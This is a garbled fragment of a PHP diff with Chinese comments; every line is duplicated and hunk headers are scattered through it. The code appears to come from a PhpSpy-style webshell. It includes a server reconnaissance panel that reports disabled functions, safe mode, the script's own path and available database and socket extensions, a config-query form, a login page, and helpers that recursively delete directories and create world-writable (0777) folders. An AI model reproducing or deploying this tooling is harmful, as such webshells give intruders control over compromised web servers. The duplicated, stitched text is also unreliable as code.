$info[5] = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]); $info[5] = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$info[6] = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]); $info[6] = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);
$info[7] = array("Web服务端口",$_SERVER["SERVER_PORT"]); $info[7] = array("Web服务端口",$_SERVER["SERVER_PORT"]);
$info[8] = array("PHP运行方式",strtoupper(php_sapi_name())); $info[8] = array("PHP运行方式",strtoupper(php_sapi_name()));
$info[9] = array("PHP版本",PHP_VERSION); $info[9] = array("PHP版本",PHP_VERSION);
$info[10] = array("运行于安全模式",getphpcfg("safemode")); $info[10] = array("运行于安全模式",getphpcfg("safemode"));
$info[11] = array("服务器管理员",$adminmail); $info[11] = array("服务器管理员",$adminmail);
$info[12] = array("本文件路径",__FILE__); $info[12] = array("本文件路径",__FILE__);
$info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")); $info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));
$info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")); $info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));
$info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors")); $info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors"));
$info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals")); $info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));
$info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")); $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
$info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")); $info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));
$info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size")); $info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));
$info[20] = array("允许最大上传文件 upload_max_filesize",$upsize); $info[20] = array("允许最大上传文件 upload_max_filesize",$upsize);
$info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"); $info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒");
$info[22] = array("被禁用的函数 disable_functions",$dis_func); $info[22] = array("被禁用的函数 disable_functions",$dis_func);
$info[23] = array("phpinfo()",$phpinfo); $info[23] = array("phpinfo()",$phpinfo);
$info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'); $info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
$info[25] = array("图形处理 GD Library",getfun("imageline")); $info[25] = array("图形处理 GD Library",getfun("imageline"));
$info[26] = array("IMAP电子邮件系统",getfun("imap_close")); $info[26] = array("IMAP电子邮件系统",getfun("imap_close"));
$info[27] = array("MySQL数据库",getfun("mysql_close")); $info[27] = array("MySQL数据库",getfun("mysql_close"));
$info[28] = array("SyBase数据库",getfun("sybase_close")); $info[28] = array("SyBase数据库",getfun("sybase_close"));
$info[29] = array("Oracle数据库",getfun("ora_close")); $info[29] = array("Oracle数据库",getfun("ora_close"));
$info[30] = array("Oracle 8 数据库",getfun("OCILogOff")); $info[30] = array("Oracle 8 数据库",getfun("OCILogOff"));
$info[31] = array("PREL相容语法 PCRE",getfun("preg_match")); $info[31] = array("PREL相容语法 PCRE",getfun("preg_match"));
$info[32] = array("PDF文档支持",getfun("pdf_close")); $info[32] = array("PDF文档支持",getfun("pdf_close"));
$info[33] = array("Postgre SQL数据库",getfun("pg_close")); $info[33] = array("Postgre SQL数据库",getfun("pg_close"));
$info[34] = array("SNMP网络管理协议",getfun("snmpget")); $info[34] = array("SNMP网络管理协议",getfun("snmpget"));
$info[35] = array("压缩文件支持(Zlib)",getfun("gzclose")); $info[35] = array("压缩文件支持(Zlib)",getfun("gzclose"));
$info[36] = array("XML解析",getfun("xml_set_object")); $info[36] = array("XML解析",getfun("xml_set_object"));
$info[37] = array("FTP",getfun("ftp_login")); $info[37] = array("FTP",getfun("ftp_login"));
$info[38] = array("ODBC数据库连接",getfun("odbc_close")); $info[38] = array("ODBC数据库连接",getfun("odbc_close"));
$info[39] = array("Session支持",getfun("session_start")); $info[39] = array("Session支持",getfun("session_start"));
$info[40] = array("Socket支持",getfun("fsockopen")); $info[40] = array("Socket支持",getfun("fsockopen"));
?> ?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?action=phpenv" method="POST"> <form action="?action=phpenv" method="POST">
<tr class="firstalt"> <tr class="firstalt">
<td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td> <td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
</tr> </tr>
<tr class="secondalt"> <tr class="secondalt">
<td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td> <td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
</tr> </tr>
</form> </form>
<?php <?php
for($a=0;$a<3;$a++){ for($a=0;$a<3;$a++){
if($a == 0){ if($a == 0){
$hp = array("server","服务器特性"); $hp = array("server","服务器特性");
}elseif($a == 1){ }elseif($a == 1){
$hp = array("php","PHP基本特性"); $hp = array("php","PHP基本特性");
}elseif($a == 2){ }elseif($a == 2){
$hp = array("basic","组件支持状况"); $hp = array("basic","组件支持状况");
} }
?> ?>
<tr class="firstalt"> <tr class="firstalt">
@ -679,10 +679,10 @@ echo "</table>";
<?php <?php
/*====================================================== /*======================================================
函数库 函数库
======================================================*/ ======================================================*/
// 登陆入口 // 登陆入口
function loginpage() { function loginpage() {
?> ?>
<style type="text/css"> <style type="text/css">
@ -702,7 +702,7 @@ echo "</table>";
exit; exit;
}//end loginpage() }//end loginpage()
// 页面调试信息 // 页面调试信息
function debuginfo() { function debuginfo() {
global $starttime; global $starttime;
$mtime = explode(' ', microtime()); $mtime = explode(' ', microtime());
@ -710,7 +710,7 @@ echo "</table>";
echo "Processed in $totaltime second(s)"; echo "Processed in $totaltime second(s)";
} }
// 去掉转义字符 // 去掉转义字符
function stripslashes_array(&$array) { function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) { while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
@ -725,7 +725,7 @@ echo "</table>";
return $array; return $array;
} }
// 删除目录 // 删除目录
function deltree($deldir) { function deltree($deldir) {
$mydir=@dir($deldir); $mydir=@dir($deldir);
while($file=$mydir->read()) { while($file=$mydir->read()) {
@ -740,10 +740,10 @@ echo "</table>";
} }
$mydir->close(); $mydir->close();
@chmod("$deldir",0777); @chmod("$deldir",0777);
echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>"; echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";
} }
// 判断读写情况 // 判断读写情况
function dir_writeable($dir) { function dir_writeable($dir) {
if (!is_dir($dir)) { if (!is_dir($dir)) {
@mkdir($dir, 0777); @mkdir($dir, 0777);
@ -760,7 +760,7 @@ echo "</table>";
return $writeable; return $writeable;
} }
// 表格行间的背景色替换 // 表格行间的背景色替换
function getrowbg() { function getrowbg() {
global $bgcounter; global $bgcounter;
if ($bgcounter++%2==0) { if ($bgcounter++%2==0) {
@ -770,7 +770,7 @@ echo "</table>";
} }
} }
// 获取当前的文件系统路径 // 获取当前的文件系统路径
function getPath($mainpath, $relativepath) { function getPath($mainpath, $relativepath) {
global $dir; global $dir;
$mainpath_info = explode('/', $mainpath); $mainpath_info = explode('/', $mainpath);
@ -788,7 +788,7 @@ echo "</table>";
return implode('/', $mainpath_info); return implode('/', $mainpath_info);
} }
// 检查PHP配置参数 // 检查PHP配置参数
function getphpcfg($varname) { function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) { switch($result = get_cfg_var($varname)) {
case 0: case 0:
@ -803,8 +803,8 @@ echo "</table>";
} }
} }
// 检查函数情况 // 检查函数情况
function getfun($funName) { function getfun($funName) {
return (false !== function_exists($funName)) ? Yes : No; return (false !== function_exists($funName)) ? Yes : No;
} }
?> ?>